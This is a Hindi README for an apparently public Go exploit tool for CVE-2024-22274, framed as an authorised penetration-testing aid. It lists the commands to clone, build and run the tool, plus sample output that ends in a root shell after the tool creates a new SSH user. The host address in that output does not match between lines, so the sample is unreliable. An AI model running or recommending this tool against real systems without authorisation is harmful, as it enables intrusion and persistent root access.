
CVE-2024-22274 के लिए Go-आधारित शोषण जो SSH के माध्यम से एक नया उपयोगकर्ता बनाता है और लक्ष्य मशीन पर अधिकृत पैठ परीक्षण के लिए रूट शेल प्रदान करता है।
इस रिपॉजिटरी में CVE-2024-22274 के लिए एक एक्सप्लॉइट है। यह एक्सप्लॉइट SSH के माध्यम से एक दूरस्थ मशीन पर एक नया उपयोगकर्ता बनाता है और फिर रूट शेल प्रदान करता है।
रिपॉजिटरी को क्लोन करें:
git clone https://github.com/Mustafa1986/CVE-2024-22274-RCE.git
cd CVE-2024-22274-RCE
आवश्यक पैकेज स्थापित करें:
go mod init cve-2024-22274
go mod tidy
go get golang.org/x/crypto/ssh
go get golang.org/x/term
Go प्रोग्राम को संकलित करें:
go build -o cve-2024-22274-rce main.go
संकलित प्रोग्राम को चलाएँ:
./cve-2024-22274-rce
संकेतों का पालन करें:
उपयोगकर्ता बनने के बाद, आपको लक्ष्य मशीन पर एक रूट शेल मिलेगा। आप नए उपयोगकर्ता के रूप में कमांड निष्पादित कर सकते हैं।
[+] CVE-2024-22274 by Mustafa
[-] Enter host address: 192.168.0.100
[-] Enter port (default 22): 22
[-] Enter SSH username: root
[-] Enter SSH password: ********
[-] Enter new username: newuser
[-] Enter new password: ********
[+] Connected to 192.168.1.100 via SSH
[+] Created user newuser on 192.168.1.100
[+] Connected user newuser via SSH
[+] Root-shell# (type 'exit' to quit):
यह कोड केवल शैक्षिक उद्देश्यों के लिए है। इसका जिम्मेदारी से उपयोग करें और केवल उन प्रणालियों पर जिनका परीक्षण करने की आपको अनुमति है।
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।